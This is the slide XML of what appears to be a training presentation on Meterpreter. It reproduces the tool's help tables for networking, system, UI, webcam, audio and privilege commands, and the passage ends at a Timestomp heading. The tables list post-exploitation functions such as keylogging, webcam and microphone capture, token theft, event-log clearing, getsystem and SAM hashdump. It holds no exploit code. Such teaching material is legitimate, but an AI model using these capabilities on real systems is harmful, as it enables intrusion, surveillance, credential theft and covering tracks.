          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>Stdapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>: Networking Commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>===========================</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    Command       Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    -------       -----------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>           Display the host ARP cache</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>getproxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>      Display the current proxy configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>      Display interfaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    ipconfig      Display interfaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    netstat       Display the network connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>portfwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>       Forward a local port to a remote service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    resolve       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>Resolve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> a set of host names on the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    route         View and modify the routing table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ar-EG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41904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74734" y="530083"/>
            <a:ext cx="11986791" cy="6236477"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AE0C5E1-E24A-0FE8-907D-175C2145B909}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="84448" y="616017"/>
            <a:ext cx="5929162" cy="4770537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>Stdapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>: System Commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>=======================</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    Command       Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    -------       -----------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>clearev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>       Clear the event log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>drop_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    Relinquishes any active impersonation token.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    execute       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>Execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> a command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>getenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>        Get one or more environment variable values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>getpid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>        Get the current process identifier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>getprivs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>      Attempt to enable all privileges available to the current process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>getsid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>        Get the SID of the user that the server is running as</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>getuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>        Get the user that the server is running as</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    kill          Terminate a process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>localtime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>     Displays the target system local date and time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>pgrep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>         Filter processes by name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>pkill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>         Terminate processes by name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>            List running processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    reboot        Reboots the remote computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    reg           Modify and interact with the remote registry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    rev2self      Calls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>RevertToSelf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>() on the remote machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    shell         Drop into a system command shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    shutdown      Shuts down the remote computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>steal_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>   Attempts to steal an impersonation token from the target process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    suspend       Suspends or resumes a list of processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>sysinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>       Gets information about the remote system, such as OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ar-EG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18011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74734" y="530083"/>
            <a:ext cx="11986791" cy="6236477"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0260BD59-4983-7311-E7D2-D5C1815D97DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="130475" y="635268"/>
            <a:ext cx="12286114" cy="3139321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>Stdapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>: User interface Commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>===============================</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    Command        Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    -------        -----------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>enumdesktops</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>   List all accessible desktops and window stations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>getdesktop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>        Get the current meterpreter desktop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>idletime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>             Returns the number of seconds the remote user has been idle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>keyboard_send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> Send keystrokes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>keyevent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>           Send key events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>keyscan_dump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>  Dump the keystroke buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>keyscan_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    Start capturing keystrokes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>keyscan_stop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    Stop capturing keystrokes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    mouse               Send mouse events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    screenshare      Watch the remote user desktop in real time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    screenshot        Grab a screenshot of the interactive desktop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>setdesktop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>        Change the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>meterpreters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> current desktop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>uictl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>                   Control some of the user interface components</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="203704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74734" y="530083"/>
            <a:ext cx="11986791" cy="6236477"/>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5E09D859-4C5C-6E28-192A-0A498AB5B474}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="74734" y="625642"/>
            <a:ext cx="11575983" cy="6186309"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>Stdapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>: Webcam Commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>=======================</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    Command        Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    -------        -----------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>record_mic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>        Record audio from the default microphone for X seconds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>webcam_chat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    Start a video chat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>webcam_list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>       List webcams</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>webcam_snap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    Take a snapshot from the specified webcam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>webcam_stream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> Play a video stream from the specified webcam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>Stdapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>: Audio Output Commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>=============================</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    Command       Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    -------       -----------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    play          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>play</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> a waveform audio file (.wav) on the target system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Priv: Elevate Commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>======================</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    Command       Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    -------       -----------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>getsystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>     Attempt to elevate your privilege to that of local system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Priv: Password database Commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>================================</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    Command       Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    -------       -----------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>hashdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>      Dumps the contents of the SAM database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="306641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924956-9186-29CF-04B2-7BE06ADB8FE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="74734" y="530083"/>
            <a:ext cx="11986791" cy="6236477"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D5E7263-2709-E05E-42D0-44BB6E98CB54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6864"/>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Advanced Meterpreter Commands</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1"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A73EAB63-EF34-D424-66CF-2A5F6E716C03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="130475" y="530084"/>
            <a:ext cx="3151825" cy="1554272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Priv: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>Timestomp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> Commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>========================</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
